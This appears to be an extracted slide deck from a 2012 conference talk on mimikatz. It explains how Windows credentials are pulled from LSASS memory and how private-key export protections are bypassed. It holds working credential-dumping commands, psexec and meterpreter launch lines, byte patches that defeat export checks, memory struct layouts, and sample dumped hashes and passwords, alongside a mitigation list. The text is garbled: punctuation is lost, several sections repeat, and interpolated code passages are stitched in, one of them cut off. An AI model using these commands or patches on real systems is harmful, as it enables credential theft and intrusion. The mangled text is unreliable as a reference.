mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESx
[Diagram: LsaUnprotectMemory in mimikatz calls the lsasrv copy, whose keys are copied from the lsass process (lsasrv): g_cbRandomKey (DWORD, 256) and g_pRandomKey → BYTE[g_cbRandomKey]; g_pDESXKey → BYTE[144]; g_Feedback BYTE[8]]
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES
[Diagram: keys copied from the lsass process (lsasrv) into mimikatz: InitializationVector BYTE[16]; h3DesKey and hAesKey, each a KIWI_BCRYPT_KEY whose cle member points to a KIWI_BCRYPT_KEY_DATA]

typedef struct _KIWI_BCRYPT_KEY_DATA {
	DWORD size;
	DWORD tag;
	DWORD type;
	DWORD unk0;
	DWORD unk1;
	DWORD unk2;
	DWORD unk3;
	PVOID unk4;
	BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
	DWORD size;
	DWORD type;
	PVOID unk0;
	PKIWI_BCRYPT_KEY_DATA cle;
	PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz sekurlsa – memo
Security Packages
Package          Symbols                                 Type
tspkg            tspkg!TSGlobalCredTable                 RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                   LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList      LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList           LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable    RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList                 LIST_ENTRY
                 lsasrv!LogonSessionListCount            ULONG

Protection Keys
Key     NT 5 Symbols                                NT 6 Symbols
(IV)                                                lsasrv!InitializationVector
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback
3DES                                                lsasrv!h3DesKey
AES                                                 lsasrv!hAesKey
mimikatz sekurlsa – memo
Some commands:
mimikatz # privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)	/* Traitement du Kiwi (Aug 2 2012 01:32:28) */	// http://blog.gentilkiwi.com/mimikatz
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
	msv1_0 :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	wdigest :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	tspkg :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	livessp : n.t. (LUID KO)
mimikatz sekurlsa – what we can do
Basics
– No physical access to the computer (the first step to pass the hash, then pass the pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit pass the hash: it keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Take opportunities to stop retro compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz crypto – what is it?
A little module that I wrote to:
– play with Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates/keys
  • Even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again ;))
mod_mimikatz_crypto
mimikatz crypto – how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • At least not without the master keys and/or passwords of the users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password
– Popup
– Export/Archive flag not present
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz :: crypto :: patch::cng – because sometimes I own LSASS
This time the checks and the keys are in the LSASS process… So what?
I wrote “1” byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
(the opcode of the conditional short jump, 75 = jnz rel8, becomes the unconditional one, EB = jmp rel8; the displacement byte 1C is untouched, so the export path is always taken)
mimikatz :: crypto :: patch::cng – demo time
Import, export, import as not exportable… export again
mimikatz :: crypto :: patch::cng – limitations
The patch operation needs some privileges:
 – Admin (debug privilege)
 – SYSTEM
mimikatz crypto::patchcng only deals with:
 – Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC Certificates snap-in cannot export CNG certificates… even those that are exportable (huh?)
 – certutil can…
mimikatz :: crypto :: patch::cng – bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
 – until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
 – Yeah, like the good old certutil
Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto – memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
 – PFX files are protected by this password: mimikatz
Keys
 – When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
 – When you delete a certificate, Windows does not delete its private key… funny, isn't it?
   • So yes, mimikatz can export it
mimikatz :: crypto – what we can do
Exactly the same as for sekurlsa: what prevents access to accounts / computers is – no admin, no admin, no admin…
Basics
 – Use smartcards/tokens for users' certificates
 – Use Hardware Security Modules (HSM), even SoftHSM
More in depth
 – See what Microsoft can do with the TPM from Windows 8
   • Virtual Smart Card seems promising
 – Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
   • Their biometrics stuff was a little buggy ;)
mimikatz – what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
AppLocker / SRP bypass
Driver
 – Play with tokens & privileges
 – Display SSDT x86 & x64
 – List minifilters actions
 – List Notifications (process, thread, image, registry)
 – List Objects hooks and procedures
 – …
…
mimikatz – that's all folks
Thanks to / Merci à
 – my girlfriend for her support (her LSASS crashed a few times)
 – Application Security Forum for offering me this great opportunity
   • Partners and Sponsors, for sure
 – Microsoft for always considering it as normal/acceptable
 – Security friends/community for their ideas & challenges
   • nagual, newsoft, mubix, …
 – You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: tspkg – demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest – what is it?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network. […]” – Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios:
 – Authenticated client access to a Web site
 – Authenticated client access using SASL
 – Authenticated client access with integrity protection to a directory service using LDAP” – Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool:
 – No password over the network, just hashes
 – No reversible password in Active Directory, hashes for each realm
   • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest – what is it?
We speak about hashes, but what hashes?
H = MD5(HA1 : nonce : […] : HA2)
 • HA1 = MD5(username : realm : password)
 • HA2 = MD5(method : digestURI […])
Even after login, HA1 may change… the realm comes from the server side and cannot be determined before Windows logon.
So the WDigest provider must keep the elements needed to compute responses for different servers:
 – Username
 – Realm (from server)
 – Password
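To make the realm dependency concrete, here is an added example (mine, not from the slides or from mimikatz) that computes the RFC 2617 Digest response with Python's hashlib. The fields the slide elides between nonce and HA2 are nc, cnonce and qop; the sample values are the RFC's own worked example plus a second, invented realm "intranet.example". Same user and password, two realms: two different HA1 values, which is why a provider that cached only the logon realm's HA1 could not answer the second server, and why WDigest keeps the password itself.

```python
"""Digest Authentication (RFC 2617) response computation.

Added example for this page, not from the slides or from mimikatz.  Shows why a
client-side provider needs the password rather than one cached HA1: HA1 is
bound to the server's realm, which the client only learns from the challenge."""
import hashlib


def _md5_hex(*parts):
    """MD5 over the colon-joined fields, the Digest H()/KD() construction."""
    return hashlib.md5(":".join(parts).encode("utf-8")).hexdigest()


def ha1(username, realm, password):
    """HA1 = MD5(username:realm:password): realm-bound, so one per server realm."""
    return _md5_hex(username, realm, password)


def ha2(method, digest_uri):
    """HA2 = MD5(method:digestURI), the qop=auth form (the slide's [...] covers qop=auth-int)."""
    return _md5_hex(method, digest_uri)


def digest_response(username, realm, password, nonce, nc, cnonce, method, digest_uri, qop="auth"):
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2) for qop=auth (RFC 2617 section 3.2.2.1);
    nc, cnonce and qop are the fields the slide elides between nonce and HA2."""
    return _md5_hex(ha1(username, realm, password), nonce, nc, cnonce, qop, ha2(method, digest_uri))


def responses_for_realms(username, password, realms, nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
                         nc="00000001", cnonce="0a4f113b", method="GET", digest_uri="/dir/index.html"):
    """One password, several servers: returns {realm: (HA1, response)}.

    Every realm yields a different HA1, so a provider that kept only the HA1 of the
    logon realm could not answer a server in another realm; keeping the password
    (as WDigest does) is what makes a later answer computable."""
    return {realm: (ha1(username, realm, password),
                    digest_response(username, realm, password, nonce, nc, cnonce, method, digest_uri))
            for realm in realms}


def rfc2617_worked_example():
    """RFC 2617 section 3.5: user Mufasa, password 'Circle Of Life', realm testrealm@host.com."""
    return digest_response("Mufasa", "testrealm@host.com", "Circle Of Life",
                           "dcd98b7102dd2f0e8b11d0f600bfb0c093", "00000001", "0a4f113b",
                           "GET", "/dir/index.html")


if __name__ == "__main__":
    for realm, (h1, resp) in responses_for_realms("Mufasa", "Circle Of Life",
                                                  ["testrealm@host.com", "intranet.example"]).items():
        print(realm, h1, resp)
```

The RFC example response is 6629fae49393a05397450978507c4ef1; change only the realm and both HA1 and the response change, although nothing about the user or password did.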
mimikatz :: sekurlsa :: wdigest – theory
This time we know:
 – that WDigest keeps the password in memory « by protocol », for the HA1 digest
 – that LSASS loves to unprotect passwords with LsaUnprotectMemory (so they were protected with LsaProtectMemory)
LsaUnprotectMemory
 – At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
 – Let's search for it in WDigest
 – Hypothesis seems verified
LsaProtectMemory
 – At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
 – Let's search for it in WDigest
 – SpAcceptCredentials takes the clear password in its arguments
   • Protects it with LsaProtectMemory
   • Updates or inserts data in the doubly linked list wdigest!l_LogSessList
.text:7409D151 _DigestCalcHA1@8        call dword ptr [eax+0B4h]
.text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest – workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID: search the linked list wdigest!l_LogSessList for the entry whose LocallyUniqueIdentifier matches → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory on the Password field → password in clear.]
typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest – demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp – how?
Actually I've only used a logical (empirical) approach to search for passwords…
 – Protocol reading
 – Symbol searching
~ Boring ~… let's be more brutal this time: set a WinDbg trap
0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!RtlpBreakWithStatusInstruction:
814b39d0 cc              int     3
0: kd> .reload /user
Loading User Symbols
0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
0: kd> g
mimikatz :: sekurlsa :: livessp – how?
Let's log in with a Live account on Windows 8
After credential protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
lsasrv!LsaProtectMemory
livessp!LiveMakeSupplementalCred
livessp!LiveMakeSecPkgCredentials
livessp!LsaApLogonUserEx2
livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
[…]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah, Pass-the-Hash capability with Live accounts too…
Live users can log on through RDP via SSO
mimikatz :: sekurlsa :: livessp – workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID: search the linked list livessp!LiveGlobalLogonSessionList for the matching LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds → KIWI_LIVESSP_PRIMARY_CREDENTIAL → LsaUnprotectMemory on the Password field → password in clear.]
typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa
Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's log in with a normal account
After credential protection, KerbCreateLogonSession calls:
 – NT6: KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
 – NT5: KerbInsertLogonSession to insert data in KerbLogonSessionList
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
Kerberos part for the password
Kerberos ticket part? Maybe ;)
mimikatz :: sekurlsa :: kerberos (nt6) – workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID: RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory on the Password field → password in clear.]
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) – workflow
[Diagram: LsaEnumerateLogonSessions → for each LUID: search the linked list kerberos!KerbLogonSessionList for the matching LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory on the Password field → password in clear.]
typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa – demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos – “huh?”
OK. It works…
But why?
Not at every logon on NT5 (an unlock can be needed)
From my understanding of Microsoft's explanations:
 – no need for passwords in the Kerberos protocol…
 – everything is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic…
 – For password auth:
   • password hash as the shared secret, but the password is kept in memory
 – For full smartcard auth:
   • No password on the client
   • No hash on the client
   – NTLM hash on the client…
   – the KDC sent it back, as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
 – This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process, to take advantage of its keys when we called it
Could it be fun to decrypt outside the process? – Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can load lsasrv.dll too, and “imports” the keys LSASS initialized
 – When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are inside LSASS
mimikatz :: sekurlsa – LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
 – RC4
 – DESx
[Diagram: lsasrv inside lsass holds g_pRandomKey (pointer to BYTE[g_cbRandomKey]), g_cbRandomKey (DWORD, 256), g_pDESXKey (pointer to BYTE[144]) and g_Feedback (BYTE[8]); mimikatz loads its own lsasrv and copies… these values from the lsass process into it.]
mimikatz :: sekurlsa – LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
 – 3DES
 – AES
[Diagram: lsasrv inside lsass holds InitializationVector (BYTE[16]), h3DesKey and hAesKey (handles to KIWI_BCRYPT_KEY structures whose `cle` member points to the KIWI_BCRYPT_KEY_DATA holding the raw key); mimikatz loads its own lsasrv and copies… them from the lsass process.]
typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
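Putting two of the sekurlsa workflows together, here is an added example of mine (not mimikatz code): the list walk over a wdigest!l_LogSessList-style ring described on the wdigest workflow slide, followed by the NT6 key-selection rule just stated (a protected blob whose length is a multiple of 8 was encrypted with the 3DES key, anything else with the AES key). It walks a circular LIST_ENTRY chain in a constructed memory image, matches the LUID, dereferences the LSA_UNICODE_STRINGs and reports which LSASS key the Password blob must be fed to. The field offsets are an illustrative x64 layout invented for the example, not the real Windows offsets (the real entries contain the members shown as […] above); the chaining modes (CBC for 3DES, CFB for AES) are assumed from later public mimikatz source rather than from the slides; and nothing is decrypted, because the keys exist only inside LSASS.

```python
"""Walk an LSASS logon-session list in a captured memory image and pick the
LSASS protection key for the Password blob.

Added example for this page, not mimikatz code.  The layout below is an
illustrative x64 layout invented for the example (the real entries contain the
members the slides show as [...]); the 3DES/AES choice is the NT6 rule from the
slide, the CBC/CFB modes are assumed from later public mimikatz source."""
import struct

# Illustrative x64 offsets for this example (NOT real Windows structure offsets).
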